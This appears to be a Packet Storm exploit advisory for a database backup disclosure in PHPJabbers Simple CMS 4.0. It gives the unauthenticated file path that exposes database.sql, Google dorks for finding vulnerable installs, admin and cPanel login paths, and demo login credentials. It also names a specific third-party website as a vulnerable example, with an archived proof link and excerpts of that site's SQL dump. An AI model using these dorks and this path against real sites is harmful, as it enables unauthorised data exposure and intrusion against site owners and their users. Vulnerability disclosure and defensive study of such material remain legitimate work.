Simple CMS PHPJabbers Stivasoft 4.0 Database Disclosure

Simple CMS PHPJabbers Stivasoft version 4.0 suffers from a database disclosure vulnerability.

MD5 | 6317788f4b1a25bbcebec695b9c59dfd

Download

#################################################################################################

# Exploit Title : Simple CMS PHPJabbers Stivasoft 4.0 Database Backup
Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 17/12/2018
# Vendor Homepage : phpjabbers.com ~ stivasoft.com ~ racingriverwebs.com
# Software Download Link : phpjabbers.com/simple-cms/
# Demo Software :
demo.phpjabbers.com/1544995520_332/index.php?controller=pjAdminSections&action=pjActionIndex
+ Login Details => Email:  [email protected]  Password:  pass
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 4.0
# Exploit Risk : Medium
# Google Dorks : intext:''PHP Scripts Copyright A(c) 2018 StivaSoft Ltd''
+ intext:''Hotel Booking script by PHPJabbers.com -
+ intext:''A(c) Copyright Dravis Interests 2003-2018 Website by Racing River
Website Solutions''
+ intext:''Website by Racing River Website Solutions''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]

#################################################################################################

# Admin Panel Login Path :

/scms4/index.php?controller=Admin&action=login

# CPanel Login Path :

p3plcpnl0800.prod.phx3.secureserver.net:2083

# Exploit :

/scms4/app/config/database.sql

#################################################################################################

# Example SQL Dump Information => dravisinterests.com

DROP TABLE IF EXISTS `simple_cms_files`;
CREATE TABLE IF NOT EXISTS `simple_cms_files` (

DROP TABLE IF EXISTS `simple_cms_roles`;
CREATE TABLE IF NOT EXISTS `simple_cms_roles` (

DROP TABLE IF EXISTS `simple_cms_sections`;
CREATE TABLE IF NOT EXISTS `simple_cms_sections` (

DROP TABLE IF EXISTS `simple_cms_users`;
CREATE TABLE IF NOT EXISTS `simple_cms_users` (

DROP TABLE IF EXISTS `simple_cms_users_files`;
CREATE TABLE IF NOT EXISTS `simple_cms_users_files` (

DROP TABLE IF EXISTS `simple_cms_users_sections`;
CREATE TABLE IF NOT EXISTS `simple_cms_users_sections` (

DROP TABLE IF EXISTS `simple_cms_options`;
CREATE TABLE IF NOT EXISTS `simple_cms_options` (

INSERT INTO `simple_cms_roles` (`id`, `role`, `status`) VALUES
(1, 'admin', 'T'),
(2, 'editor', 'T');

#################################################################################################

# Example Vulnerable Site =>

[+] dravisinterests.com/scms4/app/config/database.sql => [ Proof of Concept
for Vuln ] => archive.is/43J4N

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Source: packetstormsecurity.com